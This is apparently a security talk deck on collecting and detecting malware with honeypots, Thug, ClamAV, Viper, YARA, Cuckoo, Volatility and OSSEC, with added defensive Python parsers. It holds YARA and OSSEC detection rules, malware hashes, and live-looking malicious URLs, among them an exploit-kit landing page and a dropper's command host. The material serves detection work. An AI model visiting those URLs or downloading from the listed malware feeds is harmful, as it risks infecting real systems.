Malware detection with OSSEC
@santiagobassett

Setting up a malware lab
Collection - Analysis - Detection
Malware collection techniques
Honeypots
Web spiders - honeyclients
Malware crawlers
Honeypot
Dionaea: Low interaction honeypot that
emulates vulnerable network services.
https://github.com/rep/dionaea (written in C)
santiago@cuckoo:~$ nmap dionaea
Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 21:04 PDT
Nmap scan report for dionaea (54.235.216.XXX)
Host is up (0.070s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
42/tcp open nameserver
80/tcp open http
135/tcp open msrpc
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
Honeypot results
• Captured 126 unique binaries in 3 months
• Highly detected by ClamAV (80%)
santiago@dionaea:/opt/dionaea/var/dionaea/binaries# clamscan *
022aeb126d2d80e683f7f2a3ee920874: Trojan.Spy-78857 FOUND
05800e1eb163994359e4c946d4a0fecb: Backdoor.Floder-3 FOUND
06267149140c0bc9ba51222c165f2d61: Worm.Autorun-7683 FOUND
0682f3dfbdab7c040ac9307c50792d0a: Trojan.Buzus-9369 FOUND
074b815d9ded01b516a62e3b739caa10: Win.Trojan.Agent-372503 FOUND
07fea379703307c5addc20e237cdd0f0: Win.Trojan.Jorik-1388 FOUND
09481313331ff5a8b8bfa4e25cbaa524: Worm.Autorun-7516 FOUND
0a9f1cd12f1b34ca71fa585e87e91c7d: OK
0b4c4078231ee36731080858187a49b8: Win.Trojan.Injector-8166 FOUND
0feae931ee71a495614f14f3c1d37246: Trojan.Mybot-5073 FOUND
10ec7cb47314a2c08decb25e53fedcfa: Trojan.Injector-558 FOUND
1205a52e42687c922aa4d3700d778398: Trojan.Kazy-1372 FOUND
12fb7332920a7797c2d02df29b57c640: Trojan.Spy-78857 FOUND
16b0357b804d9651d9057b61d78bee08: Win.Trojan.Agent-368816 FOUND
1a813b6ea08a47f2997e2e4215eba96b: WIN.Trojan.IRCBot-1225 FOUND
…
----------- SCAN SUMMARY -----------
Known viruses: 3517573
Engine version: 0.98.1
Scanned directories: 0
Scanned files: 126
Infected files: 101
Data scanned: 17.65 MB
Data read: 18.11 MB (ratio 0.97:1)
Time: 56.447 sec (0 m 56 s)
Honeyclient
Thug: Low interaction honeyclient, used to detect
drive-by-download attacks.
https://github.com/buffer/thug (Python)
Thug emulates:
• Core browser functionality
• ActiveX controls
• Browser plugins
Drive-by-download attack
http://urlquery.net/report.php?id=1410227505197
Honeyclient results
santiago@mwcollector:~/thug/src$ ./thug.py webgalleriet.no/
[2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment-reply.js?ver=20090102 (Status: 200, Referrer: http://www.webgalleriet.no/)
[2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment-reply.js?ver=20090102 (Content-type: application/javascript, MD5: d484fa08997df765852c6ad283ec52c6)
[2014-09-11 22:58:31] <iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="http://168bet.com/cocs.html?j=1095012" width="2"></iframe>
[2014-09-11 22:58:31] [iframe redirection] http://www.webgalleriet.no/ -> http://168bet.com/cocs.html?j=1095012
[2014-09-11 22:58:31] [URL Classifier] URL: http://168bet.com/cocs.html?j=1095012 (Rule: Redkit 1, Classification: Landing page, Exploit Kit)
Malware crawlers
Retrieve files using malware tracking sites.
https://github.com/technoskald/maltrieve (Python)
https://code.google.com/p/malware-crawler/ (Python)
Malware tracking sites:
http://malc0de.com/rss
http://www.malwareblacklist.com/mbl.xml
http://www.malwaredomainlist.com/hostslist/mdl.xml
http://vxvault.siri-urz.net/URL_List.php
http://urlquery.net/
http://support.clean-mx.de/clean-mx/xmlviruses.php
Malware crawler results
• Captured 345 unique binaries in 15 minutes
• Poorly detected by ClamAV (16%)
santiago@mwcollector:~/binaries/maltrieve$ clamscan *
02d36dff08b63b123d2d2a36089e3d97: OK
03a6ac145099cf77bf5c7af127696687: OK
03e49fb415aacf9d2c90821ff0596024: OK
0568a72d4c5a2eb510207ca45b8d8799: OK
06ddb91e1d5f056590dfeef71a2da264: JS.Iframe-2 FOUND
074fbceca8fe84bae582a7a114b2ce94: HTML.Iframe-63 FOUND
0889504acc370f2adec7869b9bc5bc5c: OK
08d53833d032d71c1e7ffd3cddcd2a5e: JS.Iframe-2 FOUND
0ac790c459a0ef9bb4959321918a2d57: OK
0cc1c5c2ef510bd9f587abbc402d04a3: OK
0e3c692048a35c06ffe81a473ffd1d41: OK
136264a09b94bf8f08278b0045a84905: OK
13e78b2bab4a0ae9a3c2003d3f004dd1: JS.Obfus-31 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 3517100
Engine version: 0.98.4
Scanned directories: 0
Scanned files: 235
Infected files: 38
Data scanned: 164.24 MB
Data read: 143.86 MB (ratio 1.14:1)
Time: 254.462 sec (4 m 14 s)
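The two clamscan listings above are compared by hand (80% of honeypot binaries detected, 16% of crawler binaries). The following Python parser, added here and not part of the deck, reads clamscan's per-file lines and its summary block, computes the detection rate, cross-checks it against ClamAV's own "Infected files" count, and groups hits by signature family so that a corpus dominated by one family (the repeated Trojan.Spy-78857 above) is visible. The embedded output is a constructed sample in clamscan's format, not the full listing from the slides.

```python
import re
from collections import Counter

# Constructed sample in the format clamscan prints (not the deck's full listing):
# one "<file>: <signature> FOUND" or "<file>: OK" line per file, then the summary block.
SAMPLE_CLAMSCAN_OUTPUT = """\
022aeb126d2d80e683f7f2a3ee920874: Trojan.Spy-78857 FOUND
05800e1eb163994359e4c946d4a0fecb: Backdoor.Floder-3 FOUND
0a9f1cd12f1b34ca71fa585e87e91c7d: OK
0b4c4078231ee36731080858187a49b8: Win.Trojan.Injector-8166 FOUND
12fb7332920a7797c2d02df29b57c640: Trojan.Spy-78857 FOUND
0cc1c5c2ef510bd9f587abbc402d04a3: OK

----------- SCAN SUMMARY -----------
Known viruses: 3517573
Engine version: 0.98.1
Scanned directories: 0
Scanned files: 6
Infected files: 4
Time: 2.001 sec (0 m 2 s)
"""

# "<path>: <signature> FOUND" or "<path>: OK"; ClamAV signature names contain no spaces.
RESULT_RE = re.compile(r"^(?P<path>.+?): (?:(?P<sig>\S+) FOUND|OK)$")
SUMMARY_RE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<value>.+)$")


def parse_clamscan(text):
    """Return ({path: signature-or-None}, {summary key: value}) from clamscan output."""
    results, summary, in_summary = {}, {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if "SCAN SUMMARY" in line:
            in_summary = True
            continue
        if in_summary:
            m = SUMMARY_RE.match(line)
            if m:
                summary[m.group("key")] = m.group("value")
            continue
        m = RESULT_RE.match(line)
        if m:
            results[m.group("path")] = m.group("sig")  # None when the file was OK
    return results, summary


def detection_rate(results):
    """(detected, total, percent) over the per-file results."""
    total = len(results)
    detected = sum(1 for sig in results.values() if sig)
    return detected, total, (100.0 * detected / total if total else 0.0)


def family_counts(results):
    """Collapse 'Trojan.Spy-78857' to 'Trojan.Spy' so one family with many variants stands out."""
    return Counter(sig.rsplit("-", 1)[0] for sig in results.values() if sig)


def summary_consistent(results, summary):
    """True when our per-file count agrees with clamscan's own summary block."""
    detected, total, _ = detection_rate(results)
    return (int(summary.get("Scanned files", -1)) == total
            and int(summary.get("Infected files", -1)) == detected)


if __name__ == "__main__":
    res, summ = parse_clamscan(SAMPLE_CLAMSCAN_OUTPUT)
    d, t, pct = detection_rate(res)
    print(f"{d}/{t} detected ({pct:.1f}%), summary consistent: {summary_consistent(res, summ)}")
    for family, n in family_counts(res).most_common():
        print(f"  {family}: {n}")
```

Pipe a real run through it with `clamscan * | python3 clamstats.py` after swapping the sample for `sys.stdin.read()`; the family breakdown is what makes the honeypot corpus (many variants of a few worm and bot families) and the crawler corpus (mostly unknown to ClamAV) comparable beyond the single percentage.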
Malware database - Viper
Binary analysis and management framework.
https://github.com/botherder/viper (Python)
Static Analysis - Yara
Flexible, human-readable rules that identify malicious
content by its strings and byte patterns.
Can be used to analyze:
• files
• memory (Volatility)
• network streams
private rule APT1_RARSilent_EXE_PDF {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $winrar1 = "WINRAR.SFX" wide ascii
        $winrar2 = ";The comment below contains SFX script commands" wide ascii
        $winrar3 = "Silent=1" wide ascii
        $str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
        $str2 = "Steup=\"" wide ascii
    condition:
        all of ($winrar*) and 1 of ($str*)
}
Static Analysis - Yara
viper > find name 3f2fda43121d888428b66717b984a7fb
+---+----------------------------------+-----------------------+----------------------------------+------+
| # | Name | Mime | MD5 | Tags |
+---+----------------------------------+-----------------------+----------------------------------+------+
| 1 | 3F2FDA43121D888428B66717B984A7FB | application/x-dosexec | 3f2fda43121d888428b66717b984a7fb | apt |
+---+----------------------------------+-----------------------+----------------------------------+------+
viper > open -l 1
[*] Session opened on
/home/santiago/viper/binaries/6/a/f/2/6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e
viper 3F2FDA43121D888428B66717B984A7FB > yara scan
[*] Scanning 3F2FDA43121D888428B66717B984A7FB
(6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e)
+------------------+--------+--------+----------------------------------+
| Rule | String | Offset | Content |
+------------------+--------+--------+----------------------------------+
| APT1_WEBC2_TABLE | $msg1 | 440032 | Fail To Execute The Command |
| APT1_WEBC2_TABLE | $msg2 | 440060 | Execute The Command Successfully |
| APT1_WEBC2_TABLE | $gif1 | 440100 | sdwefa.gif |
| APT1_WEBC2_TABLE | $gif1 | 440101 | dwefa.gif |
| APT1_WEBC2_TABLE | $gif1 | 440102 | wefa.gif |
| APT1_WEBC2_TABLE | $gif1 | 440103 | efa.gif |
| APT1_WEBC2_TABLE | $gif1 | 440104 | fa.gif |
| APT1_WEBC2_TABLE | $gif1 | 440105 | a.gif |
| APT1_WEBC2_TABLE | $gif2 | 440112 | GIF89 |
+------------------+--------+--------+----------------------------------+
rule APT1_WEBC2_TABLE
{
meta:
author = "AlienVault Labs"
info = "CommentCrew-threat-apt1"
strings:
$msg1 = "Fail To Execute The
Command" wide ascii
$msg2 = "Execute The Command
Successfully" wide ascii
$gif1 = /w+.gif/
$gif2 = "GIF89" wide ascii
condition:
3 of them
}
viper 3F2FDA43121D888428B66717B984A7FB > yara rules
+----+-----------------------------------+
| # | Path |
+----+-----------------------------------+
| 1 | data/yara/hangover.yara |
| 2 | data/yara/citizenlab.yara |
| 3 | data/yara/APT_NGO_wuaclt_PDF.yara |
| 4 | data/yara/kins.yara |
| 5 | data/yara/themask.yara |
| 6 | data/yara/vmdetect.yara |
| 7 | data/yara/index.yara |
| 8 | data/yara/GeorBotBinary.yara |
| 9 | data/yara/leverage.yar |
| 10 | data/yara/apt1.yara |
| 11 | data/yara/GeorBotMemory.yara |
| 12 | data/yara/rats.yara |
| 13 | data/yara/embedded.yara |
| 14 | data/yara/urausy_skypedat.yar |
| 15 | data/yara/fpu.yara |
+----+-----------------------------------+
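The `yara scan` table above shows one thing worth understanding before writing rules: a single regex string, `$gif1 = /\w+\.gif/`, produced six hits at consecutive offsets (sdwefa.gif, dwefa.gif, wefa.gif, ...), and the `wide ascii` modifier on the text strings made them match whether the binary stored them as ASCII or as UTF-16LE. The Python below is an added illustration, not code from the deck, from YARA or from Viper; it re-implements just enough of YARA's string semantics for the APT1_WEBC2_TABLE rule (ASCII and wide encodings, a regex tried at every offset, and the `3 of them` condition) to reproduce that table on a constructed buffer. Real scanning should of course use YARA itself (or `yara-python`); the point is to see why the offsets come out the way they do.

```python
import re

# String section of the APT1_WEBC2_TABLE rule shown above. "wide ascii" means a text
# string is searched both as plain ASCII and as UTF-16LE ("wide") bytes.
RULE_STRINGS = {
    "$msg1": ("text", "Fail To Execute The Command", ("ascii", "wide")),
    "$msg2": ("text", "Execute The Command Successfully", ("ascii", "wide")),
    "$gif1": ("regex", rb"\w+\.gif", ()),
    "$gif2": ("text", "GIF89", ("ascii", "wide")),
}
CONDITION_MIN_STRINGS = 3  # the rule's condition: "3 of them"

# Constructed buffer (not a real sample): one ASCII string, one UTF-16LE string,
# a GIF filename and a GIF header, laid out after a fake MZ stub.
SAMPLE_BINARY = (
    b"MZ" + b"\x00" * 14
    + b"Fail To Execute The Command\x00"
    + "Execute The Command Successfully".encode("utf-16-le") + b"\x00\x00"
    + b"sdwefa.gif\x00GIF89a"
)


def find_all(data, needle):
    """Every offset at which needle occurs, overlapping occurrences included."""
    hits, start = [], 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan(data, strings=RULE_STRINGS, min_strings=CONDITION_MIN_STRINGS):
    """Return (rule_matched, [(identifier, offset, matched_bytes)]) like `viper yara scan`."""
    matches = []
    for ident, (kind, value, modifiers) in strings.items():
        if kind == "text":
            encodings = []
            if "ascii" in modifiers:
                encodings.append(value.encode("ascii"))
            if "wide" in modifiers:
                encodings.append(value.encode("utf-16-le"))
            for needle in encodings:
                matches += [(ident, off, needle) for off in find_all(data, needle)]
        else:
            pattern = re.compile(value)
            # YARA reports a regex hit at every offset where the pattern can start, which is
            # why the table above lists sdwefa.gif, dwefa.gif, wefa.gif, ... for one $gif1.
            # Trying match() at each offset reproduces that; it is fine for a demonstration,
            # not for scanning gigabytes.
            for off in range(len(data)):
                m = pattern.match(data, off)
                if m:
                    matches.append((ident, off, m.group(0)))
    matched_identifiers = {ident for ident, _, _ in matches}
    return len(matched_identifiers) >= min_strings, sorted(matches, key=lambda t: (t[1], t[0]))


if __name__ == "__main__":
    matched, hits = scan(SAMPLE_BINARY)
    print("rule matched:", matched)
    for ident, off, content in hits:
        print(f"{ident:6} {off:6} {content!r}")
```

The practical lesson for rule authors is in the `$gif1` behaviour: a short, permissive regex fires many times per file and counts as one string for the `N of them` condition, so it adds little evidence while costing scan time; anchoring it or combining it with the more specific text strings, as the rule does, is what keeps the match meaningful.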
Static Analysis – Trojan Dropper
viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe sections
[*] PE Sections:
+--------+---------+-------------+-------------+---------------+
| Name | RVA | VirtualSize | RawDataSize | Entropy |
+--------+---------+-------------+-------------+---------------+
| .text | 0x1000 | 0xbe8f | 49152 | 6.52204488284 |
| .rdata | 0xd000 | 0x1855 | 6656 | 5.17849300065 |
| .data | 0xf000 | 0x19cb8 | 512 | 1.31023024266 |
| .CRT | 0x29000 | 0x10 | 512 | 0.21310128451 |
| .rsrc | 0x2a000 | 0x7fd8 | 32768 | 5.79943302325 |
+--------+---------+-------------+-------------+---------------+
viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe imports
...
[*] DLL: ADVAPI32.dll
- 0x40d000: RegCloseKey
- 0x40d004: RegOpenKeyExA
- 0x40d008: RegQueryValueExA
- 0x40d00c: RegCreateKeyExA
- 0x40d010: RegSetValueExA
...
viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe compiletime
[*] Compile Time: 2010-03-14 23:27:58
viper 0A37D49E798F50C8F1010D5CFDE0E851 > yara scan
[*] Scanning 0A37D49E798F50C8F1010D5CFDE0E851
(dbf0436908c9d900e69ea2a108f08061786d299b511265b78620a4401361084b)
viper 0A37D49E798F50C8F1010D5CFDE0E851 > fuzzy
[*] 1 relevant matches found
+-------+----------------------------------+------------------------------------------------------------------+
| Score | Name | SHA256 |
+-------+----------------------------------+------------------------------------------------------------------+
| 68% | 003EE3D21DF82975337AE976F8BA67CC | 2803fba5fbe908f6151597c2a387caef8f00a5f0f194bfc6b4d9f89026d53621 |
+-------+----------------------------------+------------------------------------------------------------------+
viper 0A37D49E798F50C8F1010D5CFDE0E851 > virustotal
[*] VirusTotal Report:
+----------------------+----------------------------------------------+
| Antivirus            | Signature                                    |
+----------------------+----------------------------------------------+
| nProtect             | Trojan.Downloader.JKVR                       |
| McAfee               | Artemis!0A37D49E798F                         |
| K7GW                 | Trojan-Downloader                            |
| NANO-Antivirus       | Trojan.Win32.Agent.hbmsz                     |
| Symantec             | Downloader                                   |
| TotalDefense         | Win32/FakeDoc_i                              |
| TrendMicro-HouseCall | TROJ_DLOADER.VTG                             |
| Avast                | Win32:Trojan-gen                             |
| ClamAV               | Trojan.Downloader-83571                      |
| Kaspersky            | Trojan-Downloader.Win32.Agent.thb            |
| BitDefender          | Trojan.Downloader.JKVR                       |
| Agnitum              | Trojan.DL.Agent!virRS0ijj7k                  |
| Emsisoft             | Trojan.Downloader.JKVR (B)                   |
| Comodo               | TrojWare.Win32.TrojanDownloader.Agent.thb_30 |
| F-Secure             | Trojan.Downloader.JKVR                       |
| TrendMicro           | TROJ_DLOADER.VTG                             |
| McAfee-GW-Edition    | Artemis!0A37D49E798F                         |
| Sophos               | Troj/DwnLdr-IYR                              |
| Jiangmin             | TrojanDownloader.Agent.boly                  |
| Antiy-AVL            | Trojan/Win32.Agent.gen                       |
| Microsoft            | TrojanDownloader:Win32/Pingbed.A             |
| Commtouch            | W32/Downloader.NIHT-8726                     |
| AhnLab-V3            | Dropper/Malware.101512                       |
Fuzzy hash match info
Dynamic Analysis - Cuckoo
Automated malware analysis. Runs binary files in
virtual machines to study their behavior.
• Traces Win32 API calls
• Files created, deleted and downloaded
• Memory dumps of malicious processes
• Network traffic pcaps
Integrated with YARA, VirusTotal and Volatility, among
other tools. Supports VirtualBox, KVM and VMware.
Dynamic Analysis – Trojan Dropper
Behavioral Analysis – Filesystem
Behavioral Analysis – Network
santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ sudo tcpdump -s 0 -XX -AA -nn -r dump.pcap | grep -A 4 63.233.155.6
reading from file dump.pcap, link-type EN10MB (Ethernet)
23:32:20.655808 IP 8.8.8.8.53 > 192.168.56.103.63943: 53551 1/0/0 A 63.233.155.6 (50)
0x0000: 0800 2723 f165 0a00 2700 0000 0800 4500 ..'#.e..'.....E.
0x0010: 004e eca8 0000 2d11 97d7 0808 0808 c0a8 .N....-.........
0x0020: 3867 0035 f9c7 003a ef52 d12f 8180 0001 8g.5...:.R./....
0x0030: 0001 0000 0000 0377 7777 0867 6172 7968 .......www.garyh
--
23:32:20.662766 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E.
0x0010: 0034 10ab 4000 8006 161a c0a8 3867 3fe9 .4..@.......8g?.
0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<.......
0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............
--
23:32:23.663174 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E.
0x0010: 0034 10c2 4000 8006 1603 c0a8 3867 3fe9 .4..@.......8g?.
0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<.......
0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............
--
23:32:29.661778 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,nop,sackOK], length 0
0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E.
0x0010: 0030 10dc 4000 8006 15ed c0a8 3867 3fe9 .0..@.......8g?.
0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 7002 .....P..<.....p.
0x0030: 2000 f63a 0000 0204 05b4 0101 0402 ...:..........
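What the capture above shows is a DNS answer for www.garyhart.com followed by three SYNs to 63.233.155.6:80 from the same source port with the same sequence number and no SYN-ACK, i.e. the sandbox resolved the host and retried a connection that was never answered. That pattern (a freshly resolved name, then unanswered connection attempts) is a useful thing to pull out of a sandbox pcap automatically. The Python below is an added example, not part of the deck or of Cuckoo: it reads `tcpdump -nn` text lines, ties DNS answers back to the queried name by transaction id, and reports every client/server/port triple that sent SYNs without ever receiving a SYN-ACK. The DNS answer and the three SYNs are the deck's own lines; the DNS query line and the completed handshake to 192.0.2.10 (a TEST-NET address) are constructed so that one answered connection is present as a control.

```python
import re
from collections import defaultdict

# tcpdump -nn text lines. The DNS answer and the three SYNs are those of the deck's capture;
# the DNS query line and the completed handshake to 192.0.2.10 (TEST-NET) are constructed.
SAMPLE_TCPDUMP = [
    "23:32:20.601112 IP 192.168.56.103.63943 > 8.8.8.8.53: 53551+ A? www.garyhart.com. (34)",
    "23:32:20.655808 IP 8.8.8.8.53 > 192.168.56.103.63943: 53551 1/0/0 A 63.233.155.6 (50)",
    "23:32:20.662766 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0",
    "23:32:23.663174 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0",
    "23:32:29.661778 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,nop,sackOK], length 0",
    "23:32:30.000001 IP 192.168.56.103.49170 > 192.0.2.10.80: Flags [S], seq 1, win 8192, length 0",
    "23:32:30.050002 IP 192.0.2.10.80 > 192.168.56.103.49170: Flags [S.], seq 7, ack 2, win 65535, length 0",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): (?P<rest>.*)$")
DNS_QUERY_RE = re.compile(r"^(?P<txid>\d+)\+ A\? (?P<name>\S+)\. ")
DNS_ANSWER_RE = re.compile(r"^(?P<txid>\d+) \d+/\d+/\d+ A (?P<ip>\d+\.\d+\.\d+\.\d+)")
FLAGS_RE = re.compile(r"^Flags \[(?P<flags>[^\]]*)\]")


def split_endpoint(endpoint):
    """'192.168.56.103.49166' -> ('192.168.56.103', 49166)."""
    host, _, port = endpoint.rpartition(".")
    return host, int(port)


def unanswered_connections(lines):
    """[(client, server_ip, port, resolved_name, syn_count)] for SYNs that never got a SYN-ACK."""
    name_by_txid, name_by_ip = {}, {}
    syns = defaultdict(int)   # (client, server, port) -> number of SYNs sent
    answered = set()          # (client, server, port) that received a SYN-ACK
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst, rest = m.group("src"), m.group("dst"), m.group("rest")
        q = DNS_QUERY_RE.match(rest)
        if q:
            name_by_txid[q.group("txid")] = q.group("name")
            continue
        a = DNS_ANSWER_RE.match(rest)
        if a:
            name_by_ip[a.group("ip")] = name_by_txid.get(a.group("txid"), "?")
            continue
        f = FLAGS_RE.match(rest)
        if not f:
            continue
        s_host, s_port = split_endpoint(src)
        d_host, d_port = split_endpoint(dst)
        if f.group("flags") == "S":
            syns[(s_host, d_host, d_port)] += 1
        elif f.group("flags") == "S.":          # the SYN-ACK flows server -> client
            answered.add((d_host, s_host, s_port))
    return [(client, server, port, name_by_ip.get(server, "?"), n)
            for (client, server, port), n in syns.items()
            if (client, server, port) not in answered]


if __name__ == "__main__":
    for client, server, port, name, n in unanswered_connections(SAMPLE_TCPDUMP):
        print(f"{client} -> {server}:{port} ({name}): {n} SYNs, no SYN-ACK")
```

Feed it `tcpdump -nn -r dump.pcap` output (without `-XX`, which adds hex lines the regexes simply skip). An unanswered destination is still an indicator: the dropper's second-stage host being down at analysis time does not make the name and address it asked for any less useful for a network block or a DNS watchlist.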
Behavioral Analysis – Registry
Memory Analysis - Volatility
santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py psxview --profile=Win7SP1x86 -f memory.dmp
Volatility Foundation Volatility Framework 2.4
Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- --------
0x7b6fa500 audiodg.exe 960 True False True True True True True
0x7b7afd40 sppsvc.exe 1780 True False True True True True True
0x779fb808 svchost.exe 724 True False True True True True True
0x7b7be710 svchost.exe 1892 True False True True True True True
0x7c4ea7d8 VBoxService.ex 624 True False True True True True True
0x7b6f4030 svchost.exe 900 True False True True True True True
0x7b7bb618 svchost.exe 3376 True False True True True True True
0x7cd99a58 AcroRD32.exe 3080 True False True True True True True
0x7b4fa030 SearchIndexer. 360 True False True True True True True
0x7b94a858 taskhost.exe 2920 True False True True True True True
…
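psxview is useful for exactly one question: which process-enumeration methods see a process and which do not. A process that is absent from pslist (the linked list of active processes) yet present in the thread, handle-table and session views is the textbook sign of a process hidden by unlinking; a process that only psscan finds is usually one that has already exited. The Python below is an added example, not the deck's code and not part of Volatility: it parses psxview's text table and labels each row from that pattern. The embedded table is constructed (three normal rows modelled on the listing above plus one hidden and one terminated process). Note that in the deck's own listing psscan is False for every process, so this classifier would mark all of those rows for review rather than as hidden, which is the correct reading: one view disagreeing for every process says something about the dump or the scan, not about any single process.

```python
# Columns in which psxview reports whether each process-enumeration method saw the process.
PSXVIEW_COLUMNS = ["pslist", "psscan", "thrdproc", "pspcid", "csrss", "session", "deskthrd"]

# Constructed psxview output (not the deck's): the first three rows mirror normal processes,
# svch0st.exe is unlinked from the active process list, exited.exe is a leftover of a
# terminated process that only the pool scanner still finds.
SAMPLE_PSXVIEW = """\
Volatility Foundation Volatility Framework 2.4
Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- --------
0x7b6fa500 audiodg.exe             960 True   True   True     True   True  True    True
0x7cd99a58 AcroRD32.exe           3080 True   True   True     True   True  True    True
0x7b94a858 taskhost.exe           2920 True   True   True     True   True  True    True
0x7a1c0b20 svch0st.exe            4012 False  True   True     True   True  True    True
0x7a2d4f80 exited.exe             1500 False  True   False    False  False False   False
"""


def parse_psxview(text):
    """Turn the psxview table into a list of dicts with boolean visibility flags."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 + len(PSXVIEW_COLUMNS) or not parts[0].startswith("0x"):
            continue  # banner, header and separator lines
        row = {"offset": parts[0], "name": parts[1], "pid": int(parts[2])}
        row.update({col: val == "True" for col, val in zip(PSXVIEW_COLUMNS, parts[3:])})
        rows.append(row)
    return rows


def classify(row):
    """Label one process from the pattern of views that do or do not see it."""
    seen_by = [col for col in PSXVIEW_COLUMNS if row[col]]
    if not row["pslist"] and len(seen_by) >= 3:
        # Missing from the doubly linked process list but alive in thread, handle and
        # session structures: the classic pattern of a process hidden by unlinking (DKOM).
        return "HIDDEN"
    if seen_by == ["psscan"]:
        # Only the pool scanner finds it: normally a process that has already exited.
        return "TERMINATED"
    if len(seen_by) == len(PSXVIEW_COLUMNS):
        return "OK"
    return "REVIEW"  # views disagree; worth a look, but not automatically malicious


def suspicious_processes(text):
    """(pid, name, label) for every row that is neither clean nor simply terminated."""
    out = []
    for row in parse_psxview(text):
        label = classify(row)
        if label not in ("OK", "TERMINATED"):
            out.append((row["pid"], row["name"], label))
    return out


if __name__ == "__main__":
    for pid, name, label in suspicious_processes(SAMPLE_PSXVIEW):
        print(f"{label:8} pid={pid:<6} {name}")
```

The same flow as the deck applies to anything labelled HIDDEN: `memdump -p <pid>`, then `strings` and a YARA pass over the dump, as shown in the next slides for AcroRD32.exe.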
santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py memdump --profile=Win7SP1x86 -f memory.dmp -D ./ -p 3080
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing AcroRD32.exe [ 3080] to 3080.dmp
santiago@cuckoo:~$ strings 3080.dmp | grep -i garyhart
www.garyhart.com
w.garyhart.com
w.garyhart.com
w.garyhart.com
www.garyhart.com
st: www.garyhart.com
w.garyhart.com
tp://www.garyhart.com/nfuse.htm
tp://www.garyhart.com/nfuse.htm
tp://www.garyhart.com/nfuse.htm
tp://www.garyhart.com/nfuse.htm
tp://www.garyhart.com/nfuse.htm
tp://www.garyhart.com/nfuse.htm
www.garyhart.com
http://www.garyhart.com/nfuse.htm
Memory Analysis - Yara
santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ yara /home/santiago/viper/data/yara/apt1.yara 3080.dmp
APT1_WEBC2_UGX 3080.dmp
rule APT1_WEBC2_UGX
{
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
        $exe = "DefWatch.exe" wide ascii
        $html = "index1.html" wide ascii
        $cmd1 = "!@#tiuq#@!" wide ascii
        $cmd2 = "!@#dmc#@!" wide ascii
        $cmd3 = "!@#troppusnu#@!" wide ascii
    condition:
        3 of them
}
OSSEC - Rootcheck
Used for rootkit and malware detection. It can be
used to:
• Look for suspicious files.
• Inspect files and registry keys for common
rootkits/malware entries.
• Look for hidden processes and network ports.
OSSEC – Rule for Trojan Dropper
[Trojan Dropper] [all] [0A37D49E798F50C8F1010D5CFDE0E851]
f:C:\Users\IEUser\AppData\Local\Temp\AcroRD32.exe;
r:HKEY_USERS\S-1-5-21-3463664321-2923530833-3546627382-1000\Software\Microsoft\Windows\CurrentVersion\Run -> Acroread -> r:AcroRD32.exe;
p:r:AcroRD32.exe;
/var/ossec/etc/shared/win_malware_rcl.txt
OSSEC – Alert for Trojan Dropper
alienvault:/var/ossec/bin# ./rootcheck_control -L -i 001
Policy and auditing events for agent 'Windows7 (001) - 172.16.126.134':
Resolved events:
** No entries found.
Last scan: 2014 Sep 12 18:54:24
Windows Audit: Null sessions allowed.
Windows Malware: Trojan Dropper.
